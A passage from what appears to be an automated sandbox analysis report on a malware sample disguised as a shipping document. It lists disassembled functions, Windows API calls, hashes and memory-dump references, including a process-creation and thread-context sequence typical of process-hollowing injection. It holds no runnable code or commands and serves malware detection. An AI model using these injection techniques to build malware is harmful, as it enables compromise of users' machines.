                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: 8be484e8d685b2e5d9f42834b7de4819ec90995c0529d9f9e181eb9f3cd811b8
                    • Instruction ID: f916d36c178a09a4d53f565aefb4daa3258c9940e8e9d16f50cece4bbfca631f
                    • Opcode Fuzzy Hash: 8be484e8d685b2e5d9f42834b7de4819ec90995c0529d9f9e181eb9f3cd811b8
                    • Instruction Fuzzy Hash: 2421C371A042589BDB01DF94C845BEE7BFC9F88304F045059E408B7382DBB45989CFA1
                    Function 00E6998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00E699A1
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E699B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                    • Instruction ID: a059de75ae4bb9bcac9f0b60529d6bbb394e36f6dcf4ce6d92c7bcbc7bd15350
                    • Opcode Fuzzy Hash: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                    • Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91
                    Function 00E7CBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 578bdf7dcf946baa010057e16de1e7b98389f88ec66dae2e3eb211c778364b7f
                    • Instruction ID: 1cde6136e0bee771abf69ddb59210d2f571b3810681a3f9824f30bbd2a19db18
                    • Opcode Fuzzy Hash: 578bdf7dcf946baa010057e16de1e7b98389f88ec66dae2e3eb211c778364b7f
                    • Instruction Fuzzy Hash: 77F13B716083019FC714DF28C884A6ABBE5FF88314F54992EF899AB352D731E945CF82
                    Function 00E043DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E04401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E044A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E044C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 09f2216cae8f5a91466572fc517af2a2ee4aa19d56e241c179f8272689d05aed
                    • Instruction ID: df75d29b538b7fc3372aba1d91dc0d09a4c44d2db03adc685a2b244b05c74418
                    • Opcode Fuzzy Hash: 09f2216cae8f5a91466572fc517af2a2ee4aa19d56e241c179f8272689d05aed
                    • Instruction Fuzzy Hash: 6E3171F15047019FD724DF65D984A9BBBF4FB48308F00193EF6AAA2291D7716988CB92
                    Function 00E2588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2A2EB: __NMSG_WRITE.LIBCMT ref: 00E2A312
                      • Part of subcall function 00E2A2EB: __NMSG_WRITE.LIBCMT ref: 00E2A31C
                    • __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2A348: GetModuleFileNameW.KERNEL32(00000000,00EC33BA,00000104,?,00000001,00000000), ref: 00E2A3DA
                      • Part of subcall function 00E2A348: ___crtMessageBoxW.LIBCMT ref: 00E2A488
                      • Part of subcall function 00E2321F: ___crtCorExitProcess.LIBCMT ref: 00E23225
                      • Part of subcall function 00E2321F: ExitProcess.KERNEL32 ref: 00E2322E
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 103de90dc3f921d5d03c9f1098e747ed1948a3cd1990fb587d486e4ff09eee3c
                    • Instruction ID: 7eca28c3b37be4e4c2c9e2f995d961585ed13f64300b0c33032d5b4353cc7b18
                    • Opcode Fuzzy Hash: 103de90dc3f921d5d03c9f1098e747ed1948a3cd1990fb587d486e4ff09eee3c
                    • Instruction Fuzzy Hash: E601DE33251B31DBD61C2B75FE02A6E7388DF82765B502039F511BA1A2DEB19E414B61
                    Function 00E6994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E695F1,?,?,?,?,?,00000004), ref: 00E69964
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E695F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E6997A
                    • CloseHandle.KERNEL32(00000000,?,00E695F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69981
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                    • Instruction ID: 300f88295f6525565550119388659f644b11e817bb6ac987a9564e267e1b7b80
                    • Opcode Fuzzy Hash: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                    • Instruction Fuzzy Hash: DDE08632281214BBDB212B95EC0DFDA7B28EB45775F104220FB58B90E187B119259798
                    Function 00E0AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: bf02ea3a719c590d4f5778c85cfd005357a143ec67c5d801a6608c1b7fb11431
                    • Instruction ID: d02bad6e0c179458829ef8513edb0b817327f1590b4a03a44bbf3fa6cd4498ce
                    • Opcode Fuzzy Hash: bf02ea3a719c590d4f5778c85cfd005357a143ec67c5d801a6608c1b7fb11431
                    • Instruction Fuzzy Hash: 52222A70608305DFD724DF14C494B6AB7E1FF84304F19996DE995AB2A2D731EC85CB82
                    Function 00E6785C Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: fec14785773fb934df5ac88b5f6b4e5bab1ae592b6166c11810e6679bfdcf995
                    • Instruction ID: 5bc38c57ff4c5a760a38d41c9bdf295c6b16f36b6c4823cf3b300a8c930afc24
                    • Opcode Fuzzy Hash: fec14785773fb934df5ac88b5f6b4e5bab1ae592b6166c11810e6679bfdcf995
                    • Instruction Fuzzy Hash: 2C4127716482159FD720EFA8E9819BEB7F8EF48398B256559F0C5B7283DB309C01CB60
                    Function 00E07BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                    • Instruction ID: e9a72466267afb14086bda58c1e2e50cc30675efbc3f7fd3830edaf0d467568c
                    • Opcode Fuzzy Hash: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                    • Instruction Fuzzy Hash: BF31CFB1A04506AFD714CF28D9C1E69F3A9FF48324B159629E855CB2D1EB70F8A0CB90
                    Function 00E0492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00E04992
                      • Part of subcall function 00E234EC: __lock.LIBCMT ref: 00E234F2
                      • Part of subcall function 00E234EC: DecodePointer.KERNEL32(00000001,?,00E049A7,00E57F9C), ref: 00E234FE
                      • Part of subcall function 00E234EC: EncodePointer.KERNEL32(?,?,00E049A7,00E57F9C), ref: 00E23509
                      • Part of subcall function 00E04A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E04A73
                      • Part of subcall function 00E04A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E04A88
                      • Part of subcall function 00E03B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B7A
                      • Part of subcall function 00E03B4C: IsDebuggerPresent.KERNEL32 ref: 00E03B8C
                      • Part of subcall function 00E03B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BFD
                      • Part of subcall function 00E03B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E049D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: cec11211e6e8be17a9365bf2738bebe43af098cf05feac78a1e114daceebf4a4
                    • Instruction ID: f4afca4abebfef74f000de7590e62e468d1eacc4bcb9734d58b5ed9d0927ec0c
                    • Opcode Fuzzy Hash: cec11211e6e8be17a9365bf2738bebe43af098cf05feac78a1e114daceebf4a4
                    • Instruction Fuzzy Hash: 9B118EB25143119FC704DF2AE84590AFBF8FB94750F00452EF455B32B2DB719989CB91
                    Function 00E20F36 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E2588C: __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2588C: __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2588C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    • std::exception::exception.LIBCMT ref: 00E20F6C
                    • __CxxThrowException@8.LIBCMT ref: 00E20F81
                      • Part of subcall function 00E2871B: RaiseException.KERNEL32(?,?,?,00EB9E78,00000000,?,?,?,?,00E20F86,?,00EB9E78,?,00000001), ref: 00E28770
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: a14fcb1feb597de80cf3b4e11abe29f721f83360974a0f999b26f04b93f436b2
                    • Instruction ID: 39fecad4628890b2015de66ce05dac0e2084e82bbc75bbc89aa435c77d546d03
                    • Opcode Fuzzy Hash: a14fcb1feb597de80cf3b4e11abe29f721f83360974a0f999b26f04b93f436b2
                    • Instruction Fuzzy Hash: FDF0A93554522D66DF24AB94FD069DE7BEC9F00314F142466FA08B61C3DF708A50C5D1
                    Function 00E25516 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • __lock_file.LIBCMT ref: 00E2555B
                      • Part of subcall function 00E26D8E: __lock.LIBCMT ref: 00E26DB1
                    • __fclose_nolock.LIBCMT ref: 00E25566
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: d0c5f737e5c7e9e9c253e3f47a6c624dd0080feb694da75299eb6495994442c8
                    • Instruction ID: ee9e05a23406b9f8b12b93597ca6335eb2553987cb57df683455b9588ce88418
                    • Opcode Fuzzy Hash: d0c5f737e5c7e9e9c253e3f47a6c624dd0080feb694da75299eb6495994442c8
                    • Instruction Fuzzy Hash: A5F0B472942B389ADB107F75BE067AE67E26F40335F14A209F424BB1C1CF7C49419B52
                    Function 00FE8A85 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00FE9243
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FE92D9
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FE92FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: 26bd714f109e9902b1121309df74f507af6792a00044f74ea64375e6c6ef8701
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 0E12CE24E18658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CF5A
                    Function 00E0766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 4705d5163adaee709a678a53a4cf15551d0219e71d7391744f87a28c8e337c4f
                    • Instruction ID: 8019fa482b9033a1f46e501e28da40e221528d209a56e4be4c45dca44a86eee3
                    • Opcode Fuzzy Hash: 4705d5163adaee709a678a53a4cf15551d0219e71d7391744f87a28c8e337c4f
                    • Instruction Fuzzy Hash: F431A575A08A12DFD7249F18D590961F7E0FF08360714D56AE9CA9B7E5E730E8C1CB84
                    Function 00E20D88 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 3ab1902b6f293ea14d212e9e40365f10b5f5718f04f3c2526a663f7ddba6db4a
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: E7310674A01115DFCB18DF48E480969FBB2FF49304B699AA5E409EB392DB30EDC1CB80
                    Function 00E40005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: f408494d2f4956e1c45ba181e0c6e5acfdb143d2f23c76f85deaa986dc2322d6
                    • Instruction ID: f84d8a12da6cbd972edcbd4393a82c2dea01bd1710f813c588c5c6f747dafb77
                    • Opcode Fuzzy Hash: f408494d2f4956e1c45ba181e0c6e5acfdb143d2f23c76f85deaa986dc2322d6
                    • Instruction Fuzzy Hash: C8413A74508351CFDB14DF14C484B1ABBE0BF45318F0998ACE9996B7A2C732EC85CB52
                    Function 00E07CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 91577e4960d67d03373def525d077e516399afc87ca8d05f70d71aac65f84e61
                    • Instruction ID: d72e0f93fb0ea8783908eb00169727e64809488c56befd9910dc4f2f72f25df0
                    • Opcode Fuzzy Hash: 91577e4960d67d03373def525d077e516399afc87ca8d05f70d71aac65f84e61
                    • Instruction Fuzzy Hash: 3E210272A04609EBDB188F16E8857AE7FF4FB14350F21952EE486F51A2EB3094D0CB04
                    Function 00E04F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E04D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E04D4D
                      • Part of subcall function 00E253CB: __wfsopen.LIBCMT ref: 00E253D6
                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04F6F
                      • Part of subcall function 00E04CC8: FreeLibrary.KERNEL32(00000000), ref: 00E04D02
                      • Part of subcall function 00E04DD0: _memmove.LIBCMT ref: 00E04E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
